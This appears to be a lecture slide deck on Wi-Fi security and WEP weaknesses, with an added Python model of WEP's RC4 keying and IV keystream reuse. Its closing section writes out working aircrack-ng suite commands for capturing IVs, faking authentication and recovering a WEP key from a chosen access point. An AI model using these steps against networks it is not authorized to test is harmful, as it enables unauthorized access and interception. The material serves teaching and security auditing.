Wireless Encryption: WEP and cracking it.

Eric Shea

Background on Wi-Fi

802.11 over-the-air protocol

802.11a/b/g/n:

◦Speeds

◦Frequencies

◦Range

◦Physical Obstructions

◦Example: Cordless Phone

Wireless Security Myths

◦MAC address limiting

◦Hidden SSID

◦Using WEP

◦Disable DHCP

Wireless Frames/Packets

Framing:

◦Management - clear

◦Authentication - encrypted

◦Control

◦Data - encrypted

Error detection

Collecting Frames

Important Part:

◦The Initialization Vector, or IV, is prepended onto packets and is based on a pre-shared key that all the authenticated clients know.

◦Included in every authorization frame.

◦In some data frames.

Wired Equivalent Privacy (WEP)

◦1997, deprecated

◦Intended to protect data

◦Prevent unauthorized access to the network

◦Hexadecimal 64/128/256 bit keys
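As an added illustration that is not part of Eric Shea's slides: a toy model of WEP's per-packet RC4 keying, in which the 24-bit IV that is sent in the clear is prepended to the pre-shared key (this is what the "64-bit" key size counts: a 40-bit secret plus the 24-bit IV). It shows what an auditor should take from the IV slide: IVs repeat after only a few thousand frames, and two frames under the same IV leak the XOR of their plaintexts without the key. The PSK, IV and payloads are constructed sample values.

```python
# Added example, not from the slides: a toy WEP model showing what the IV slide means.
# The 24-bit IV is sent in the clear in front of each frame; IV || PSK is the RC4 key,
# so a 64-bit "WEP-40" key is really a 40-bit secret plus the 24-bit IV.
import math
import zlib

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (key scheduling + generation), the cipher WEP is built on."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(psk: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV (3 bytes, clear) || RC4(IV||PSK) applied to payload || CRC32 ICV."""
    assert len(iv) == 3
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + xor_bytes(payload + icv, rc4_keystream(iv + psk, len(payload) + 4))

def wep_decrypt(psk: bytes, body: bytes):
    """Strip the IV, regenerate the keystream and check the ICV; None if the check fails."""
    iv, ct = body[:3], body[3:]
    pt = xor_bytes(ct, rc4_keystream(iv + psk, len(ct)))
    payload, icv = pt[:-4], pt[-4:]
    return payload if zlib.crc32(payload).to_bytes(4, "little") == icv else None

def keystream_reuse_leak(psk: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two frames under one IV share a keystream, so XOR of ciphertexts == XOR of
    plaintexts. The PSK is only used here to build the frames, not to obtain the leak."""
    c1 = wep_encrypt(psk, iv, p1)[3:]
    c2 = wep_encrypt(psk, iv, p2)[3:]
    return xor_bytes(c1, c2)[:min(len(p1), len(p2))]

def expected_frames_until_iv_collision() -> float:
    """Birthday bound for a random 24-bit IV: sqrt(pi/2 * 2^24), about 5,100 frames."""
    return math.sqrt(math.pi / 2 * 2 ** 24)
```

On a busy network a few thousand frames pass in seconds, which is why the capture step below only needs to collect IVs for a short time.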

Authentication

The client station sends an authentication request to the Access Point.

The Access Point sends back a clear-text challenge.

The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request.

The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.

War Chalking / War Driving

War Chalking - practice of marking sidewalks and walls with special symbols to indicate that wireless access is available.

War Driving - driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks.

Alternative Security

WPA/WPA2

◦random 10 digit or longer key

◦(1000) Single core computer: 500 years to crack

VPN

◦Required authentication

◦Username/password

Cracking WEP

Tools = Aircrack-ng Suite / Kismet

Kismet

◦Discover wireless networks

Airodump-ng

◦Capturing packets

Aircrack-ng

◦Brute force crack method

Aireplay

◦Packet injection

Kismet Demo

Capture packets

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

-c 9 is the channel for the wireless network.

--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.

-w output is the file name prefix for the file which will contain the IVs.

ath0 is the interface name.

Packet Injection

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

-1 means fake authentication.

0 is the reassociation timing in seconds.

-e teddy is the wireless network name.

-a 00:14:6C:7E:40:80 is the access point MAC address.

-h 00:0F:B5:88:AC:82 is our card's MAC address.

ath0 is the wireless interface name.

Cracking the captured packets

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.

output*.cap selects all files starting with "output" and ending in ".cap".

Demo Aircrack-ng Suite

Aircrack-ng Suite

www.aircrack-ng.org

Simple WEP cracking tutorial

◦http://www.aircrack-ng.org/doku.php?id=simple_wep_crack